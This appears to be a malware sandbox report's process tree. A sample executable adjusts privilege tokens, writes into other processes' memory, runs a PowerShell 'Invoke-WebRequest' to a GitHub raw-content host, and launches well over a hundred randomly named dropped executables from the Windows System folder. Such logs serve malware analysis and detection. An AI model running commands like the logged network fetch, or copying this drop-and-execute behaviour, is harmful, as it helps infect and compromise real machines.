"C:\Users\Admin\AppData\Local\Temp\60dc283da01ea9bf6be9d4ae8c71ce1b_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2960" "2948" "2880" "2952" "0" "0" "2956" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:2244
- C:\Windows\System\XWwvSGG.exe
  C:\Windows\System\XWwvSGG.exe
  2⤵
  - Executes dropped EXE
  PID:4160
- C:\Windows\System\KHrsuJB.exe
  C:\Windows\System\KHrsuJB.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\tuUwWpU.exe
  C:\Windows\System\tuUwWpU.exe
  2⤵
  - Executes dropped EXE
  PID:2024
- C:\Windows\System\ZAEQlim.exe
  C:\Windows\System\ZAEQlim.exe
  2⤵
  - Executes dropped EXE
  PID:4620
- C:\Windows\System\nqnYKoB.exe
  C:\Windows\System\nqnYKoB.exe
  2⤵
  - Executes dropped EXE
  PID:432
- C:\Windows\System\TxeENWr.exe
  C:\Windows\System\TxeENWr.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Windows\System\AZWAXSv.exe
  C:\Windows\System\AZWAXSv.exe
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Windows\System\EDrNBqr.exe
  C:\Windows\System\EDrNBqr.exe
  2⤵
  - Executes dropped EXE
  PID:4716
- C:\Windows\System\ujHNAfx.exe
  C:\Windows\System\ujHNAfx.exe
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Windows\System\upvfNti.exe
  C:\Windows\System\upvfNti.exe
  2⤵
  - Executes dropped EXE
  PID:4868
- C:\Windows\System\iMQSZZr.exe
  C:\Windows\System\iMQSZZr.exe
  2⤵
  - Executes dropped EXE
  PID:4596
- C:\Windows\System\htjoLUX.exe
  C:\Windows\System\htjoLUX.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\iZRumrm.exe
  C:\Windows\System\iZRumrm.exe
  2⤵
  - Executes dropped EXE
  PID:2360
- C:\Windows\System\wVhPWmd.exe
  C:\Windows\System\wVhPWmd.exe
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Windows\System\JgRVOeC.exe
  C:\Windows\System\JgRVOeC.exe
  2⤵
  - Executes dropped EXE
  PID:2132
- C:\Windows\System\OBGAyLi.exe
  C:\Windows\System\OBGAyLi.exe
  2⤵
  - Executes dropped EXE
  PID:4392
- C:\Windows\System\dllcwnb.exe
  C:\Windows\System\dllcwnb.exe
  2⤵
  - Executes dropped EXE
  PID:4784
- C:\Windows\System\AgZDtGI.exe
  C:\Windows\System\AgZDtGI.exe
  2⤵
  - Executes dropped EXE
  PID:4732
- C:\Windows\System\cBdEmww.exe
  C:\Windows\System\cBdEmww.exe
  2⤵
  - Executes dropped EXE
  PID:3084
- C:\Windows\System\SrsDDZQ.exe
  C:\Windows\System\SrsDDZQ.exe
  2⤵
  - Executes dropped EXE
  PID:1520
- C:\Windows\System\XlGnCMP.exe
  C:\Windows\System\XlGnCMP.exe
  2⤵
  - Executes dropped EXE
  PID:1564
- C:\Windows\System\WYYFuHS.exe
  C:\Windows\System\WYYFuHS.exe
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Windows\System\NtqqSxZ.exe
  C:\Windows\System\NtqqSxZ.exe
  2⤵
  - Executes dropped EXE
  PID:4072
- C:\Windows\System\jDZLIzC.exe
  C:\Windows\System\jDZLIzC.exe
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Windows\System\UcpLciP.exe
  C:\Windows\System\UcpLciP.exe
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\System\etOEsSG.exe
  C:\Windows\System\etOEsSG.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\hHXqTDv.exe
  C:\Windows\System\hHXqTDv.exe
  2⤵
  - Executes dropped EXE
  PID:1576
- C:\Windows\System\Eaivfua.exe
  C:\Windows\System\Eaivfua.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\reyHRkJ.exe
  C:\Windows\System\reyHRkJ.exe
  2⤵
  - Executes dropped EXE
  PID:1088
- C:\Windows\System\ToStQrv.exe
  C:\Windows\System\ToStQrv.exe
  2⤵
  - Executes dropped EXE
  PID:4216
- C:\Windows\System\OPmFCfy.exe
  C:\Windows\System\OPmFCfy.exe
  2⤵
  - Executes dropped EXE
  PID:3196
- C:\Windows\System\vBxajTp.exe
  C:\Windows\System\vBxajTp.exe
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Windows\System\MhOAYPJ.exe
  C:\Windows\System\MhOAYPJ.exe
  2⤵
  - Executes dropped EXE
  PID:4112
- C:\Windows\System\sMcwfeM.exe
  C:\Windows\System\sMcwfeM.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\yuSgClb.exe
  C:\Windows\System\yuSgClb.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\ghrKqGa.exe
  C:\Windows\System\ghrKqGa.exe
  2⤵
  - Executes dropped EXE
  PID:1920
- C:\Windows\System\DHqZyWD.exe
  C:\Windows\System\DHqZyWD.exe
  2⤵
  - Executes dropped EXE
  PID:4928
- C:\Windows\System\JGNerAu.exe
  C:\Windows\System\JGNerAu.exe
  2⤵
  - Executes dropped EXE
  PID:388
- C:\Windows\System\hRgjFxs.exe
  C:\Windows\System\hRgjFxs.exe
  2⤵
  - Executes dropped EXE
  PID:3164
- C:\Windows\System\lGmHGCP.exe
  C:\Windows\System\lGmHGCP.exe
  2⤵
  - Executes dropped EXE
  PID:3664
- C:\Windows\System\teayzoh.exe
  C:\Windows\System\teayzoh.exe
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Windows\System\xiVkAFr.exe
  C:\Windows\System\xiVkAFr.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Windows\System\rdUtpkJ.exe
  C:\Windows\System\rdUtpkJ.exe
  2⤵
  - Executes dropped EXE
  PID:1696
- C:\Windows\System\pbDDskB.exe
  C:\Windows\System\pbDDskB.exe
  2⤵
  - Executes dropped EXE
  PID:3088
- C:\Windows\System\caJuNpp.exe
  C:\Windows\System\caJuNpp.exe
  2⤵
  - Executes dropped EXE
  PID:4012
- C:\Windows\System\ckNGxrM.exe
  C:\Windows\System\ckNGxrM.exe
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Windows\System\XveCUwK.exe
  C:\Windows\System\XveCUwK.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\wmLFYTn.exe
  C:\Windows\System\wmLFYTn.exe
  2⤵
  - Executes dropped EXE
  PID:2972
- C:\Windows\System\xzmcSHA.exe
  C:\Windows\System\xzmcSHA.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Windows\System\aksMTnE.exe
  C:\Windows\System\aksMTnE.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\ORuOhde.exe
  C:\Windows\System\ORuOhde.exe
  2⤵
  - Executes dropped EXE
  PID:3376
- C:\Windows\System\hZjIJVM.exe
  C:\Windows\System\hZjIJVM.exe
  2⤵
  - Executes dropped EXE
  PID:5132
- C:\Windows\System\XmHPfry.exe
  C:\Windows\System\XmHPfry.exe
  2⤵
  - Executes dropped EXE
  PID:5168
- C:\Windows\System\LgmJAAj.exe
  C:\Windows\System\LgmJAAj.exe
  2⤵
  - Executes dropped EXE
  PID:5188
- C:\Windows\System\pbYCNid.exe
  C:\Windows\System\pbYCNid.exe
  2⤵
  - Executes dropped EXE
  PID:5216
- C:\Windows\System\QeiWDuU.exe
  C:\Windows\System\QeiWDuU.exe
  2⤵
  - Executes dropped EXE
  PID:5244
- C:\Windows\System\ZiOwdbQ.exe
  C:\Windows\System\ZiOwdbQ.exe
  2⤵
  - Executes dropped EXE
  PID:5272
- C:\Windows\System\rlZRHCY.exe
  C:\Windows\System\rlZRHCY.exe
  2⤵
  - Executes dropped EXE
  PID:5300
- C:\Windows\System\FAvKXFm.exe
  C:\Windows\System\FAvKXFm.exe
  2⤵
  - Executes dropped EXE
  PID:5328
- C:\Windows\System\iHttynl.exe
  C:\Windows\System\iHttynl.exe
  2⤵
  - Executes dropped EXE
  PID:5356
- C:\Windows\System\WSQYlVi.exe
  C:\Windows\System\WSQYlVi.exe
  2⤵
  - Executes dropped EXE
  PID:5380
- C:\Windows\System\DlFtHaZ.exe
  C:\Windows\System\DlFtHaZ.exe
  2⤵
  - Executes dropped EXE
  PID:5412
- C:\Windows\System\Opjlclw.exe
  C:\Windows\System\Opjlclw.exe
  2⤵
  - Executes dropped EXE
  PID:5444
- C:\Windows\System\ZPltvrf.exe
  C:\Windows\System\ZPltvrf.exe
  2⤵
  - Executes dropped EXE
  PID:5468
- C:\Windows\System\AiToLeV.exe
  C:\Windows\System\AiToLeV.exe
  2⤵
  PID:5496
- C:\Windows\System\zbHqlDC.exe
  C:\Windows\System\zbHqlDC.exe
  2⤵
  PID:5524
- C:\Windows\System\dFRXmxf.exe
  C:\Windows\System\dFRXmxf.exe
  2⤵
  PID:5556
- C:\Windows\System\mmpmEFY.exe
  C:\Windows\System\mmpmEFY.exe
  2⤵
  PID:5584
- C:\Windows\System\wxzsgTc.exe
  C:\Windows\System\wxzsgTc.exe
  2⤵
  PID:5612
- C:\Windows\System\TeXyHqW.exe
  C:\Windows\System\TeXyHqW.exe
  2⤵
  PID:5644
- C:\Windows\System\MDZLQvh.exe
  C:\Windows\System\MDZLQvh.exe
  2⤵
  PID:5672
- C:\Windows\System\GOkJdkK.exe
  C:\Windows\System\GOkJdkK.exe
  2⤵
  PID:5700
- C:\Windows\System\lNGKsyk.exe
  C:\Windows\System\lNGKsyk.exe
  2⤵
  PID:5728
- C:\Windows\System\igeQEOJ.exe
  C:\Windows\System\igeQEOJ.exe
  2⤵
  PID:5756
- C:\Windows\System\sRUNBpv.exe
  C:\Windows\System\sRUNBpv.exe
  2⤵
  PID:5784
- C:\Windows\System\rwiTtPX.exe
  C:\Windows\System\rwiTtPX.exe
  2⤵
  PID:5812
- C:\Windows\System\cnjBfeh.exe
  C:\Windows\System\cnjBfeh.exe
  2⤵
  PID:5840
- C:\Windows\System\hHVMqUu.exe
  C:\Windows\System\hHVMqUu.exe
  2⤵
  PID:5868
- C:\Windows\System\JnhvlIO.exe
  C:\Windows\System\JnhvlIO.exe
  2⤵
  PID:5896
- C:\Windows\System\FfDGEjp.exe
  C:\Windows\System\FfDGEjp.exe
  2⤵
  PID:5924
- C:\Windows\System\mocNLUF.exe
  C:\Windows\System\mocNLUF.exe
  2⤵
  PID:5952
- C:\Windows\System\XNDdcGW.exe
  C:\Windows\System\XNDdcGW.exe
  2⤵
  PID:5980
- C:\Windows\System\EPrJJHO.exe
  C:\Windows\System\EPrJJHO.exe
  2⤵
  PID:6008
- C:\Windows\System\ZbLZbDz.exe
  C:\Windows\System\ZbLZbDz.exe
  2⤵
  PID:6036
- C:\Windows\System\xgzRtHG.exe
  C:\Windows\System\xgzRtHG.exe
  2⤵
  PID:6068
- C:\Windows\System\WwCeOjE.exe
  C:\Windows\System\WwCeOjE.exe
  2⤵
  PID:6096
- C:\Windows\System\KYeSbXH.exe
  C:\Windows\System\KYeSbXH.exe
  2⤵
  PID:6124
- C:\Windows\System\znhPFiO.exe
  C:\Windows\System\znhPFiO.exe
  2⤵
  PID:1256
- C:\Windows\System\QPuRfrR.exe
  C:\Windows\System\QPuRfrR.exe
  2⤵
  PID:452
- C:\Windows\System\VhZhRJY.exe
  C:\Windows\System\VhZhRJY.exe
  2⤵
  PID:4488
- C:\Windows\System\PVyRJJe.exe
  C:\Windows\System\PVyRJJe.exe
  2⤵
  PID:3548
- C:\Windows\System\EhvDEXn.exe
  C:\Windows\System\EhvDEXn.exe
  2⤵
  PID:5180
- C:\Windows\System\JQOVTsp.exe
  C:\Windows\System\JQOVTsp.exe
  2⤵
  PID:5232
- C:\Windows\System\NrLaffH.exe
  C:\Windows\System\NrLaffH.exe
  2⤵
  PID:5312
- C:\Windows\System\eCyOvJQ.exe
  C:\Windows\System\eCyOvJQ.exe
  2⤵
  PID:5372
- C:\Windows\System\rjcOhLl.exe
  C:\Windows\System\rjcOhLl.exe
  2⤵
  PID:5436
- C:\Windows\System\vGvKEqg.exe
  C:\Windows\System\vGvKEqg.exe
  2⤵
  PID:5512
- C:\Windows\System\PmnreoV.exe
  C:\Windows\System\PmnreoV.exe
  2⤵
  PID:5568
- C:\Windows\System\ZkmtmUO.exe
  C:\Windows\System\ZkmtmUO.exe
  2⤵
  PID:5628
- C:\Windows\System\jyBosYE.exe
  C:\Windows\System\jyBosYE.exe
  2⤵
  PID:5692
- C:\Windows\System\qqAsuvI.exe
  C:\Windows\System\qqAsuvI.exe
  2⤵
  PID:5768
- C:\Windows\System\sAFYUso.exe
  C:\Windows\System\sAFYUso.exe
  2⤵
  PID:5824
- C:\Windows\System\JuHRsbj.exe
  C:\Windows\System\JuHRsbj.exe
  2⤵
  PID:5884
- C:\Windows\System\GgSAWPD.exe
  C:\Windows\System\GgSAWPD.exe
  2⤵
  PID:5940
- C:\Windows\System\MvaaYIJ.exe
  C:\Windows\System\MvaaYIJ.exe
  2⤵
  PID:6000
- C:\Windows\System\mamHtYJ.exe
  C:\Windows\System\mamHtYJ.exe
  2⤵
  PID:2492
- C:\Windows\System\iGNHzJc.exe
  C:\Windows\System\iGNHzJc.exe
  2⤵
  PID:6140
- C:\Windows\System\bevhjhL.exe
  C:\Windows\System\bevhjhL.exe
  2⤵
  PID:4060
- C:\Windows\System\GHyKWYF.exe
  C:\Windows\System\GHyKWYF.exe
  2⤵
  PID:5152
- C:\Windows\System\lOaeiWz.exe
  C:\Windows\System\lOaeiWz.exe
  2⤵
  PID:5288
- C:\Windows\System\lkZAKNN.exe
  C:\Windows\System\lkZAKNN.exe
  2⤵
  PID:5464
- C:\Windows\System\gBGCAZE.exe
  C:\Windows\System\gBGCAZE.exe
  2⤵
  PID:5596
- C:\Windows\System\gfYFYCK.exe
  C:\Windows\System\gfYFYCK.exe
  2⤵
  PID:5740
- C:\Windows\System\gLDibmz.exe
  C:\Windows\System\gLDibmz.exe
  2⤵
  PID:5856
- C:\Windows\System\JyMoXzU.exe
  C:\Windows\System\JyMoXzU.exe
  2⤵
  PID:1412
- C:\Windows\System\XfwfASC.exe
  C:\Windows\System\XfwfASC.exe
  2⤵
  PID:6088
- C:\Windows\System\XWCYjIL.exe
  C:\Windows\System\XWCYjIL.exe
  2⤵
  PID:4108
- C:\Windows\System\qqSecYE.exe
  C:\Windows\System\qqSecYE.exe
  2⤵
  PID:5404
- C:\Windows\System\DtQwkJs.exe
  C:\Windows\System\DtQwkJs.exe
  2⤵
  PID:5540
- C:\Windows\System\UEVvwxx.exe
  C:\Windows\System\UEVvwxx.exe
  2⤵
  PID:6172
- C:\Windows\System\dpvwqNQ.exe
  C:\Windows\System\dpvwqNQ.exe
  2⤵
  PID:6200
- C:\Windows\System\zudGdrv.exe
  C:\Windows\System\zudGdrv.exe
  2⤵
  PID:6228
- C:\Windows\System\wqQFTlj.exe
  C:\Windows\System\wqQFTlj.exe
  2⤵
  PID:6256
- C:\Windows\System\RXKrVwH.exe
  C:\Windows\System\RXKrVwH.exe
  2⤵
  PID:6284
- C:\Windows\System\ncgHPhj.exe
  C:\Windows\System\ncgHPhj.exe
  2⤵
  PID:6312
- C:\Windows\System\pQjAkqr.exe
  C:\Windows\System\pQjAkqr.exe
  2⤵
  PID:6340
- C:\Windows\System\klqWgWy.exe
  C:\Windows\System\klqWgWy.exe
  2⤵
  PID:6368
- C:\Windows\System\ypRtbVV.exe
  C:\Windows\System\ypRtbVV.exe
  2⤵
  PID:6396
- C:\Windows\System\xYrSyhk.exe
  C:\Windows\System\xYrSyhk.exe
  2⤵
  PID:6424
- C:\Windows\System\tNOCztk.exe
  C:\Windows\System\tNOCztk.exe
  2⤵
  PID:6452
- C:\Windows\System\zTOxGkC.exe
  C:\Windows\System\zTOxGkC.exe
  2⤵
  PID:6480
- C:\Windows\System\PAWwSyp.exe
  C:\Windows\System\PAWwSyp.exe
  2⤵
  PID:6508
- C:\Windows\System\nSSKPmD.exe
  C:\Windows\System\nSSKPmD.exe
  2⤵
  PID:6536
- C:\Windows\System\nKlpfwQ.exe
  C:\Windows\System\nKlpfwQ.exe
  2⤵
  PID:6564
- C:\Windows\System\oIonQZv.exe
  C:\Windows\System\oIonQZv.exe
  2⤵
  PID:6592
- C:\Windows\System\SHrHxBO.exe
  C:\Windows\System\SHrHxBO.exe
  2⤵
  PID:6620
- C:\Windows\System\kSmRGHZ.exe
  C:\Windows\System\kSmRGHZ.exe
  2⤵
  PID:6648
- C:\Windows\System\oYgrbrR.exe
  C:\Windows\System\oYgrbrR.exe
  2⤵
  PID:6676
- C:\Windows\System\AnjDUBN.exe
  C:\Windows\System\AnjDUBN.exe
  2⤵
  PID:6704
- C:\Windows\System\yerfBEX.exe
  C:\Windows\System\yerfBEX.exe
  2⤵
  PID:6732
- C:\Windows\System\FbzKsNq.exe
  C:\Windows\System\FbzKsNq.exe
  2⤵
  PID:6760
- C:\Windows\System\ixKKUQm.exe
  C:\Windows\System\ixKKUQm.exe
  2⤵
  PID:6788
- C:\Windows\System\NhShGfM.exe
  C:\Windows\System\NhShGfM.exe
  2⤵
  PID:6816
- C:\Windows\System\VjfWeXp.exe
  C:\Windows\System\VjfWeXp.exe
  2⤵
  PID:6844
- C:\Windows\System\nPtOdae.exe
  C:\Windows\System\nPtOdae.exe
  2⤵
  PID:6896
- C:\Windows\System\MDRFUQR.exe
  C:\Windows\System\MDRFUQR.exe
  2⤵
  PID:6948
- C:\Windows\System\OHUMUxc.exe
  C:\Windows\System\OHUMUxc.exe
  2⤵
  PID:6964
- C:\Windows\System\VPGoBuV.exe
  C:\Windows\System\VPGoBuV.exe
  2⤵
  PID:6984
- C:\Windows\System\iQgeLyO.exe
  C:\Windows\System\iQgeLyO.exe
  2⤵
  PID:7004
- C:\Windows\System\DBEHZyg.exe
  C:\Windows\System\DBEHZyg.exe
  2⤵
  PID:7032
- C:\Windows\System\vXCuPjY.exe
  C:\Windows\System\vXCuPjY.exe
  2⤵
  PID:7088
- C:\Windows\System\qBXtqIg.exe
  C:\Windows\System\qBXtqIg.exe
  2⤵
  PID:7104
- C:\Windows\System\cZDDVpj.exe
  C:\Windows\System\cZDDVpj.exe
  2⤵
  PID:7124
- C:\Windows\System\WDnkBIC.exe
  C:\Windows\System\WDnkBIC.exe
  2⤵
  PID:7140
- C:\Windows\System\HMZTuKd.exe
  C:\Windows\System\HMZTuKd.exe
  2⤵
  PID:7160
- C:\Windows\System\rARPYSK.exe
  C:\Windows\System\rARPYSK.exe
  2⤵
  PID:5800
- C:\Windows\System\khmGlID.exe
  C:\Windows\System\khmGlID.exe
  2⤵
  PID:4544
- C:\Windows\System\HOWoFUH.exe
  C:\Windows\System\HOWoFUH.exe
  2⤵
  PID:1660
- C:\Windows\System\OkAIHdV.exe
  C:\Windows\System\OkAIHdV.exe
  2⤵
  PID:6276
- C:\Windows\System\RqjqrKN.exe
  C:\Windows\System\RqjqrKN.exe
  2⤵
  PID:6324
- C:\Windows\System\qWmIGvh.exe
  C:\Windows\System\qWmIGvh.exe
  2⤵
  PID:6356
- C:\Windows\System\FHygAiL.exe
  C:\Windows\System\FHygAiL.exe
  2⤵
  PID:4252
- C:\Windows\System\SlKLmjK.exe
  C:\Windows\System\SlKLmjK.exe
  2⤵
  PID:6524
- C:\Windows\System\KuVmxQE.exe
  C:\Windows\System\KuVmxQE.exe
  2⤵
  PID:6556
- C:\Windows\System\mEghPsW.exe
  C:\Windows\System\mEghPsW.exe
  2⤵
  PID:6608
- C:\Windows\System\CLhLrcd.exe
  C:\Windows\System\CLhLrcd.exe
  2⤵
  PID:1508
- C:\Windows\System\dEfLRSW.exe
  C:\Windows\System\dEfLRSW.exe
  2⤵
  PID:1224
- C:\Windows\System\pYpnyYH.exe
  C:\Windows\System\pYpnyYH.exe
  2⤵
  PID:6744
- C:\Windows\System\TBeKuqA.exe
  C:\Windows\System\TBeKuqA.exe
  2⤵
  PID:6808
- C:\Windows\System\cDpBuvT.exe
  C:\Windows\System\cDpBuvT.exe
  2⤵
  PID:6836
- C:\Windows\System\ThOsJnw.exe
  C:\Windows\System\ThOsJnw.exe
  2⤵
  PID:3124
- C:\Windows\System\mwIfEXQ.exe
  C:\Windows\System\mwIfEXQ.exe
  2⤵
  PID:2384
- C:\Windows\System\maywLWy.exe
  C:\Windows\System\maywLWy.exe
  2⤵
  PID:6888
- C:\Windows\System\bcrecKc.exe
  C:\Windows\System\bcrecKc.exe
  2⤵
  PID:6940
- C:\Windows\System\fAdymjn.exe
  C:\Windows\System\fAdymjn.exe
  2⤵
  PID:6992
- C:\Windows\System\eaEWYOL.exe
  C:\Windows\System\eaEWYOL.exe
  2⤵
  PID:7096
- C:\Windows\System\fUvLVEm.exe
  C:\Windows\System\fUvLVEm.exe
  2⤵
  PID:7152
- C:\Windows\System\EAIwORW.exe
  C:\Windows\System\EAIwORW.exe
  2⤵
  PID:6304
- C:\Windows\System\eJgBuEP.exe
  C:\Windows\System\eJgBuEP.exe
  2⤵
  PID:4792
- C:\Windows\System\stWuhwP.exe
  C:\Windows\System\stWuhwP.exe
  2⤵
  PID:764
- C:\Windows\System\pCYEwxK.exe
  C:\Windows\System\pCYEwxK.exe
  2⤵
  PID:348
- C:\Windows\System\kwUcNNM.exe
  C:\Windows\System\kwUcNNM.exe
  2⤵
  PID:6640
- C:\Windows\System\osdHxGD.exe
  C:\Windows\System\osdHxGD.exe
  2⤵
  PID:3988
- C:\Windows\System\elvmFyT.exe
  C:\Windows\System\elvmFyT.exe
  2⤵
  PID:3892
- C:\Windows\System\pbFEYAe.exe
  C:\Windows\System\pbFEYAe.exe
  2⤵
  PID:4484
- C:\Windows\System\KVBhYAt.exe
  C:\Windows\System\KVBhYAt.exe
  2⤵
  PID:6972
- C:\Windows\System\kjEiDkl.exe
  C:\Windows\System\kjEiDkl.exe
  2⤵
  PID:7116
- C:\Windows\System\dmwhhEQ.exe
  C:\Windows\System\dmwhhEQ.exe
  2⤵
  PID:6028
- C:\Windows\System\tLbZVxF.exe
  C:\Windows\System\tLbZVxF.exe
  2⤵
  PID:2788
- C:\Windows\System\PvqBCkw.exe
  C:\Windows\System\PvqBCkw.exe
  2⤵
  PID:2208
- C:\Windows\System\yROInIu.exe
  C:\Windows\System\yROInIu.exe
  2⤵
  PID:6692
- C:\Windows\System\xJdArDQ.exe
  C:\Windows\System\xJdArDQ.exe
  2⤵
  PID:7028
- C:\Windows\System\OXYwrYV.exe
  C:\Windows\System\OXYwrYV.exe
  2⤵
  PID:6472
- C:\Windows\System\SwolWjH.exe
  C:\Windows\System\SwolWjH.exe
  2⤵
  PID:4552
- C:\Windows\System\DqFFWOn.exe
  C:\Windows\System\DqFFWOn.exe
  2⤵
  PID:5776
- C:\Windows\System\guAGSAp.exe
  C:\Windows\System\guAGSAp.exe
  2⤵
  PID:4860
- C:\Windows\System\lkwWxdw.exe
  C:\Windows\System\lkwWxdw.exe
  2⤵
  PID:6188
- C:\Windows\System\EOlwBgE.exe
  C:\Windows\System\EOlwBgE.exe
  2⤵
  PID:5228
- C:\Windows\System\JSxcHhL.exe
  C:\Windows\System\JSxcHhL.exe
  2⤵
  PID:596
- C:\Windows\System\YumItOD.exe
  C:\Windows\System\YumItOD.exe
  2⤵
  PID:7216
- C:\Windows\System\nrHryaC.exe
  C:\Windows\System\nrHryaC.exe
  2⤵
  PID:7236
- C:\Windows\System\TLREioj.exe
  C:\Windows\System\TLREioj.exe
  2⤵
  PID:7264
- C:\Windows\System\iipDQML.exe
  C:\Windows\System\iipDQML.exe
  2⤵
  PID:7288
- C:\Windows\System\sMEQzPW.exe
  C:\Windows\System\sMEQzPW.exe
  2⤵
  PID:7312
- C:\Windows\System\UtLNynr.exe
  C:\Windows\System\UtLNynr.exe
  2⤵
  PID:7336
- C:\Windows\System\HbxdMBJ.exe
  C:\Windows\System\HbxdMBJ.exe
  2⤵
  PID:7360
- C:\Windows\System\inNwlci.exe
  C:\Windows\System\inNwlci.exe
  2⤵
  PID:7380
- C:\Windows\System\QQbaorm.exe
  C:\Windows\System\QQbaorm.exe
  2⤵
  PID:7408
- C:\Windows\System\gdCYUja.exe
  C:\Windows\System\gdCYUja.exe
  2⤵
  PID:7440
- C:\Windows\System\QOmjDrG.exe
  C:\Windows\System\QOmjDrG.exe
  2⤵
  PID:7468
- C:\Windows\System\mgYWrqY.exe
  C:\Windows\System\mgYWrqY.exe
  2⤵
  PID:7520
- C:\Windows\System\AnDQlPG.exe
  C:\Windows\System\AnDQlPG.exe
  2⤵
  PID:7544
- C:\Windows\System\JFMpCBv.exe
  C:\Windows\System\JFMpCBv.exe
  2⤵
  PID:7576
- C:\Windows\System\HxcaFqg.exe
  C:\Windows\System\HxcaFqg.exe
  2⤵
  PID:7600
- C:\Windows\System\pdgjBJE.exe
  C:\Windows\System\pdgjBJE.exe
  2⤵
  PID:7620
- C:\Windows\System\jMxCcxe.exe
  C:\Windows\System\jMxCcxe.exe
  2⤵
  PID:7652
- C:\Windows\System\MfVeIxz.exe
  C:\Windows\System\MfVeIxz.exe
  2⤵
  PID:7692
- C:\Windows\System\WWkraTK.exe
  C:\Windows\System\WWkraTK.exe
  2⤵
  PID:7720
- C:\Windows\System\htzUcEi.exe
  C:\Windows\System\htzUcEi.exe
  2⤵
  PID:7736
- C:\Windows\System\fnwbZyt.exe
  C:\Windows\System\fnwbZyt.exe
  2⤵
  PID:7756
- C:\Windows\System\KDgRvTG.exe
  C:\Windows\System\KDgRvTG.exe
  2⤵
  PID:7772
- C:\Windows\System\hlpbAbO.exe
  C:\Windows\System\hlpbAbO.exe
  2⤵
  PID:7792
- C:\Windows\System\yiDKBLG.exe
  C:\Windows\System\yiDKBLG.exe
  2⤵
  PID:7816
- C:\Windows\System\hHczxiS.exe
  C:\Windows\System\hHczxiS.exe
  2⤵
  PID:7836
- C:\Windows\System\mWObKpS.exe
  C:\Windows\System\mWObKpS.exe
  2⤵
  PID:7852
- C:\Windows\System\ddcFjDX.exe
  C:\Windows\System\ddcFjDX.exe
  2⤵
  PID:7880
- C:\Windows\System\BOJJaWo.exe
  C:\Windows\System\BOJJaWo.exe
  2⤵
  PID:7900
- C:\Windows\System\qZSBQFs.exe
  C:\Windows\System\qZSBQFs.exe
  2⤵
  PID:7924
- C:\Windows\System\InshjJZ.exe
  C:\Windows\System\InshjJZ.exe
  2⤵
  PID:7988
- C:\Windows\System\FQvfEvy.exe
  C:\Windows\System\FQvfEvy.exe
  2⤵
  PID:8064
- C:\Windows\System\ehVeszo.exe
  C:\Windows\System\ehVeszo.exe
  2⤵
  PID:8084
- C:\Windows\System\TyPKepF.exe
  C:\Windows\System\TyPKepF.exe
  2⤵
  PID:8108
- C:\Windows\System\WusMnCi.exe
  C:\Windows\System\WusMnCi.exe
  2⤵
  PID:8124
- C:\Windows\System\hysWHeT.exe
  C:\Windows\System\hysWHeT.exe
  2⤵
  PID:8168
- C:\Windows\System\WlFQakd.exe
  C:\Windows\System\WlFQakd.exe
  2⤵
  PID:7192
- C:\Windows\System\wqHujWA.exe
  C:\Windows\System\wqHujWA.exe
  2⤵
  PID:7200
- C:\Windows\System\EvVVxMA.exe
  C:\Windows\System\EvVVxMA.exe
  2⤵
  PID:7280
- C:\Windows\System\gyOPatR.exe
  C:\Windows\System\gyOPatR.exe
  2⤵
  PID:7396
- C:\Windows\System\xIeaofg.exe
  C:\Windows\System\xIeaofg.exe
  2⤵
  PID:7428
- C:\Windows\System\VEdRYIb.exe
  C:\Windows\System\VEdRYIb.exe
  2⤵
  PID:7464
- C:\Windows\System\LcXJzfy.exe
  C:\Windows\System\LcXJzfy.exe
  2⤵
  PID:7536
- C:\Windows\System\rigDevP.exe
  C:\Windows\System\rigDevP.exe
  2⤵
  PID:7616
- C:\Windows\System\ydkcpio.exe
  C:\Windows\System\ydkcpio.exe
  2⤵
  PID:7680
- C:\Windows\System\diRuRHs.exe
  C:\Windows\System\diRuRHs.exe
  2⤵
  PID:7716
- C:\Windows\System\FxuGBFR.exe
  C:\Windows\System\FxuGBFR.exe
  2⤵
  PID:7832
- C:\Windows\System\bemHhQA.exe
  C:\Windows\System\bemHhQA.exe
  2⤵
  PID:7908
- C:\Windows\System\ZObqjYw.exe
  C:\Windows\System\ZObqjYw.exe
  2⤵
  PID:7876
- C:\Windows\System\ZnggyQe.exe
  C:\Windows\System\ZnggyQe.exe
  2⤵
  PID:8032
- C:\Windows\System\VtkWZhs.exe
  C:\Windows\System\VtkWZhs.exe
  2⤵
  PID:6580
- C:\Windows\System\WBXWjAX.exe
  C:\Windows\System\WBXWjAX.exe
  2⤵
  PID:8100
- C:\Windows\System\HEQiGjY.exe
  C:\Windows\System\HEQiGjY.exe
  2⤵
  PID:8164
- C:\Windows\System\FUQQEBM.exe
  C:\Windows\System\FUQQEBM.exe
  2⤵
  PID:7228
- C:\Windows\System\isxKoMJ.exe
  C:\Windows\System\isxKoMJ.exe
  2⤵
  PID:7416
- C:\Windows\System\CJeaDQo.exe
  C:\Windows\System\CJeaDQo.exe
  2⤵
  PID:7480
